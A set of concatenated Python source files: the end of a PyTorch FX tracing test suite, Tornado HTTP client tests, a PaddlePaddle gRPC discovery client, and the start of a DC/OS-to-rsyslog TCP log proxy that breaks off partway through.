"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
httpclient_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import base64
import binascii
from contextlib import closing
import functools
import sys
import threading
from tornado.escape import utf8
from tornado.httpclient import HTTPRequest, HTTPResponse, _RequestProxy, HTTPError, HTTPClient
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.stack_context import ExceptionStackContext, NullContext
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import unittest
from tornado.util import u, bytes_type
from tornado.web import Application, RequestHandler, url
try:
from io import BytesIO # python 3
except ImportError:
from cStringIO import StringIO as BytesIO
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish("Post arg1: %s, arg2: %s" % (
self.get_argument("arg1"), self.get_argument("arg2")))
class ChunkHandler(RequestHandler):
def get(self):
self.write("asdf")
self.flush()
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get('User-Agent', 'User agent not set'))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header('Content-Length', 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
], gzip=True)
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = []
response = self.fetch("/hello",
streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST",
body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = []
response = self.fetch("/chunk",
streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
stream.write(b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_streaming_stack_context(self):
chunks = []
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def streaming_cb(chunk):
chunks.append(chunk)
if chunk == b'qwer':
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', streaming_callback=streaming_cb)
self.assertEqual(chunks, [b'asdf', b'qwer'])
self.assertEqual(1, len(exc_info))
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_basic_auth(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_basic_auth_explicit_mode(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
response = self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf")
response.rethrow()
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"),
response.body)
def test_body_encoding(self):
unicode_body = u("\xe9")
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch("/echopost", method="POST", body=unicode_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch("/echopost", method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch("/echopost", method="POST", body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u("foo"))
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes_type)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith('HTTP/'):
first_line.append(header_line)
elif header_line != '\r\n':
k, v = header_line.split(':', 1)
headers[k] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers['Content-Type'], 'text/html; charset=UTF-8')
chunks.append(chunk)
self.fetch('/chunk', header_callback=header_callback,
streaming_callback=streaming_callback)
self.assertEqual(len(first_line), 1)
self.assertRegexpMatches(first_line[0], 'HTTP/1.[01] 200 OK\r\n')
self.assertEqual(chunks, [b'asdf', b'qwer'])
def test_header_callback_stack_context(self):
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def header_callback(header_line):
if header_line.startswith('Content-Type:'):
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', header_callback=header_callback)
self.assertEqual(len(exc_info), 1)
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_configure_defaults(self):
defaults = dict(user_agent='TestDefaultUserAgent')
# Construct a new instance of the configured client class
client = self.http_client.__class__(self.io_loop, force_instance=True,
defaults=defaults)
client.fetch(self.get_url('/user_agent'), callback=self.stop)
response = self.wait()
self.assertEqual(response.body, b'TestDefaultUserAgent')
client.close()
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch('/304_with_content_length')
self.assertEqual(response.code, 304)
self.assertEqual(response.headers['Content-Length'], '42')
def test_final_callback_stack_context(self):
# The final callback should be run outside of the httpclient's
# stack_context. We want to ensure that there is not stack_context
# between the user's callback and the IOLoop, so monkey-patch
# IOLoop.handle_callback_exception and disable the test harness's
# context with a NullContext.
# Note that this does not apply to secondary callbacks (header
# and streaming_callback), as errors there must be seen as errors
# by the http client so it can clean up the connection.
exc_info = []
def handle_callback_exception(callback):
exc_info.append(sys.exc_info())
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
self.http_client.fetch(self.get_url('/hello'),
lambda response: 1 / 0)
self.wait()
self.assertEqual(exc_info[0][0], ZeroDivisionError)
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url('/hello'))
self.assertEqual(response.body, b'Hello world!')
@gen_test
def test_future_http_error(self):
try:
yield self.http_client.fetch(self.get_url('/notfound'))
except HTTPError as e:
self.assertEqual(e.code, 404)
self.assertEqual(e.response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url('/hello')
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b'Hello world!')
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
user_agent='foo'),
dict())
self.assertEqual(proxy.user_agent, 'foo')
def test_default_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict(network_interface='foo'))
self.assertEqual(proxy.network_interface, 'foo')
def test_both_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
proxy_host='foo'),
dict(proxy_host='bar'))
self.assertEqual(proxy.proxy_host, 'foo')
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse(HTTPRequest('http://example.com'),
200, headers={}, buffer=BytesIO())
s = str(response)
self.assertTrue(s.startswith('HTTPResponse('))
self.assertIn('code=200', s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
if IOLoop.configured_class().__name__ == 'TwistedIOLoop':
# TwistedIOLoop only supports the global reactor, so we can't have
# separate IOLoops for client and server threads.
raise unittest.SkipTest(
'Sync HTTPClient not compatible with TwistedIOLoop')
self.server_ioloop = IOLoop()
sock, self.port = bind_unused_port()
app = Application([('/', HelloWorldHandler)])
server = HTTPServer(app, io_loop=self.server_ioloop)
server.add_socket(sock)
self.server_thread = threading.Thread(target=self.server_ioloop.start)
self.server_thread.start()
self.http_client = HTTPClient()
def tearDown(self):
self.server_ioloop.add_callback(self.server_ioloop.stop)
self.server_thread.join()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return 'http://localhost:%d%s' % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url('/'))
self.assertEqual(b'Hello world!', response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(assertion.exception.code, 404)
|
discovery_client.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import distill_discovery_pb2 as discovery
from . import distill_discovery_pb2_grpc
import functools
import grpc
import logging
import os
import random
import threading
import time
from ..discovery.server_alive import is_server_alive
logging.basicConfig(
level=logging.DEBUG,
format="[%(levelname)s %(asctime)s %(filename)s:%(lineno)d] %(message)s")
def _handle_errors(f):
def handler(*args, **kwargs):
retry_times = 3
for i in range(retry_times):
if i > 0:
args[0]._connect()
try:
return f(*args, **kwargs)
except grpc.RpcError as e:
logging.warning('grpc failed with {0}: {1}'.format(e.code(
), e.details()))
return functools.wraps(f)(handler)
class DiscoveryClient(object):
def __init__(self, endpoints, service_name, require_num, token=None):
self._channel = None
self._stub = None
self._client = None
self._service_name = service_name
self._require_num = require_num
self._token = token
self._version = 0
self._ret_servers = []
self._discovery_version = 0
self._discovery_servers = endpoints
self._discover = None
self._beat_thread = None
self._stop_event = threading.Event()
self._is_registered = False
self._funcs = {
discovery.Code.OK: self._process_ok,
discovery.Code.UNKNOWN: self._error,
discovery.Code.NO_READY: self._process_no_ready,
discovery.Code.REDIRECT: self._process_redirect,
discovery.Code.INVALID_ARGUMENT: self._error,
discovery.Code.ALREADY_REGISTER: self._process_already_register,
discovery.Code.REGISTER_OTHER_SERVICE: self._error,
discovery.Code.UNREGISTERED: self._process_unregistered,
discovery.Code.UNAUTHORIZED: self._error,
}
def _error(self, response):
logging.error('client={} service={} error code={}'.format(
self._client, self._service_name, response.status.code))
assert False
def _process_ok(self, response):
if not self._is_registered:
self._is_registered = True
logging.debug('client={} register success'.format(self._client))
if response.version > self._version:
self._ret_servers = response.servers
self._version = response.version
logging.info('service version={} servers={}'.format(
self._version, self._ret_servers))
if response.discovery_version > self._discovery_version:
self._discovery_servers = response.discovery_servers
self._discovery_version = response.discovery_version
logging.info('discovery_version={} servers={}'.format(
self._discovery_version, self._discovery_servers))
def _process_no_ready(self, response):
logging.info('discovery server={} is not ready'.format(self._discover))
pass
def _process_redirect(self, response):
self._is_registered = False
old_discover = self._discover
self._discover = response.status.message
self._discovery_servers = response.discovery_servers
self._discovery_version = response.discovery_version
self._version = 0
logging.info('redirect discovery server, old={} new={}'.format(
old_discover, self._discover))
# reconnect
self._connect()
def _process_already_register(self, response):
logging.info('already register')
pass
def _process_unregistered(self, response):
self._is_registered = False
def _process_response(self, response):
assert response.status.code in self._funcs
self._funcs[response.status.code](response)
@_handle_errors
def _stub_register(self, register_request):
return self._stub.Register(register_request)
@_handle_errors
def _stub_heartbeat(self, beat_request):
return self._stub.HeartBeat(beat_request)
def _register(self):
register_request = discovery.RegisterRequest(
client=self._client,
service_name=self._service_name,
require_num=self._require_num,
token=self._token)
logging.debug(
'register client={} service_name={} require_num={} token={}'.
format(self._client, self._service_name, self._require_num,
self._token))
response = self._stub_register(register_request)
self._process_response(response)
def _heartbeat(self):
while not self._stop_event.is_set():
if not self._is_registered:
self._register()
beat_request = discovery.HeartBeatRequest(
client=self._client,
version=self._version,
discovery_version=self._discovery_version)
response = self._stub_heartbeat(beat_request)
self._process_response(response)
time.sleep(2)
def _gen_client(self, addr, channel):
ip = addr[0]
pid = os.getpid()
sid = hex(id(channel))
time_stamp = int(time.time() * 1000)
# FIXME. client_uuid=ip-pid-_channel_id-timestamp, need a better method?
self._client = '{}-{}-{}-{}'.format(ip, pid, sid, time_stamp)
def _connect_server(self, server):
channel = None
retry_times = 3
for i in range(retry_times):
alive, client_addr = is_server_alive(server)
if alive:
channel = grpc.insecure_channel(server)
if self._client is None:
self._gen_client(client_addr, channel)
break
logging.warning(
'discovery server={} is not alive, failed_count={}'.format(
server, i + 1))
time.sleep(0.1 * (i + 1))
return channel
def _connect(self):
# close pre channel
if self._channel is not None:
self._channel.close()
channel = None
if self._discover is not None:
channel = self._connect_server(self._discover)
if channel is None:
endpoints = list(self._discovery_servers)
random.shuffle(endpoints)
for ep in endpoints:
channel = self._connect_server(ep)
if channel is not None:
break
assert channel is not None, 'connect with discovery failed'
self._channel = channel
self._stub = distill_discovery_pb2_grpc.DiscoveryServiceStub(
self._channel)
def start(self, daemon=True):
if self._channel is not None:
return
assert self._channel is None
assert self._stub is None
self._connect()
self._beat_thread = threading.Thread(target=self._heartbeat)
self._beat_thread.daemon = daemon
self._beat_thread.start()
def stop(self):
if self._channel is None:
return
self._stop_event.set()
self._beat_thread.join()
self._stop_event.clear()
self._stub = None
self._channel.close()
self._channel = None
def get_servers(self):
return self._ret_servers
if __name__ == '__main__':
client = DiscoveryClient(['127.0.0.1:50051', '127.0.0.1:50052'],
'TestService', 4)
# client = DiscoveryClient(['127.0.0.1:50051'], 'TestService2', 4)
client.start(daemon=True)
for i in range(1000):
servers = client.get_servers()
print(servers)
time.sleep(1)
|
dcos_rsyslog_tcp_proxy.py
|
#!/usr/bin/env python3.6
# Brief: Logs Proxy between DC/OS and Rsyslog
# Author: Alejandro Villegas Lopez <avillegas@keedio.com>
################################################################################
# Libraries
import json
import socket
import time
import threading
import argparse
import logging
import errno
import os
from systemd.journal import JournaldLogHandler
# MAX Connections from DC/OS Journal
MAX_CONNECTIONS=10
logger=None
def send (rsyslog_socket, data):
""" Send data to rsyslog socket """
logger.debug("Sending data: %s", data)
print("\nSend Data: " + data)
rsyslog_socket.send((data + "\n").encode("utf-8"))
def get_first_json(str_err, data):
""" Return the first JSON struct in data buffer """
# Index of Error string with the index of the next JSON struct
extra_data_msg_index = str_err.find("char", 0, len(str_err)) + 5
next_msg_index = str_err[extra_data_msg_index:-1]
# Extract the first JSON struct
return data[0:int(next_msg_index)]
def process_data (rsyslog_socket, data):
""" Process the data buffer readed from TCP socket """
# No data recived
if len(data) == 0:
return ""
# Process Data Buffer
while 1:
try:
# LookUp a JSON struct
json.loads(data)
except json.decoder.JSONDecodeError as e:
# Error String
str_err = str(e)
if str_err.startswith("Extra data:"):
json_msg = get_first_json (str_err, data)
data = data[len(json_msg):]
# Send Data
send(rsyslog_socket, json_msg)
logger.debug("Buffered Data: %d", len(json_msg))
elif str_err.startswith("Unterminated string starting at:"):
break
else:
logger.error(str_err)
break
except:
logger.error(sys.exc_info()[0])
else:
# Send Data
send(rsyslog_socket, data)
# Clean Data buffer
data=""
break
return data
def worker (conn, addr, rsyslog_socket, buffer_read_size):
""" Read from the TCP buffer and lookup for one valid JSON struct. When a
JSON struct is find, it sends to Rsyslog and start over
"""
data=""
# Read from socket forever
while 1:
data = data + conn.recv(buffer_read_size).decode("utf-8")
# Connection Closed
if not data:
logger.debug("Connection Closed")
break
else:
data = process_data(rsyslog_socket, data)
conn.close()
def run (dcos_ip, dcos_port, rsyslog_ip, rsyslog_port, buffer_read_size):
""" Open sockets and create threads for process the messages of each connection """
# Output Socket to "rsyslog"
logger.info("Connecting to Rsyslog: %s:%d", rsyslog_ip, rsyslog_port)
rsyslog_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
rsyslog_socket.connect((rsyslog_ip, rsyslog_port))
except socket.error as err:
if err.errno == errno.ECONNREFUSED:
logger.error("Can't connect to Rsyslog")
else:
logger.info("Connected to Rsyslog!")
# Input Socket from "mesos-journal"
logger.info("Binding to %s:%d to recive DC/OS Journal logs", dcos_ip, dcos_port)
dcos_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dcos_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
dcos_socket.bind((dcos_ip, dcos_port))
except socket.error as err:
logger.error("Can't Bind to %s:%d", dcos_ip, dcos_port)
return
else:
dcos_socket.listen(MAX_CONNECTIONS)
logger.info("Accepting connections")
while 1:
conn, addr = dcos_socket.accept()
thread = threading.Thread(target=worker, args=(conn, addr, rsyslog_socket, buffer_read_size), daemon=True)
thread.start()
logger.debug("New Connection from %s", addr)
if __name__ == "__main__":
""" Parse Arguments, configure logging and run the app """
# Arguments parsing
parser = argparse.ArgumentParser(description='DC/OS Container Logs - Rsyslog Proxy')
parser.add_argument('--dcos-journal-ip', default="127.0.0.1", help='DC/OS Journal for container logs IP')
parser.add_argument('--dcos-journal-port', default=61092, help='DC/OS Journal for container logs Port')
parser.add_argument('--rsyslog-ip', default="127.0.0.1", help='System Rsyslog IP')
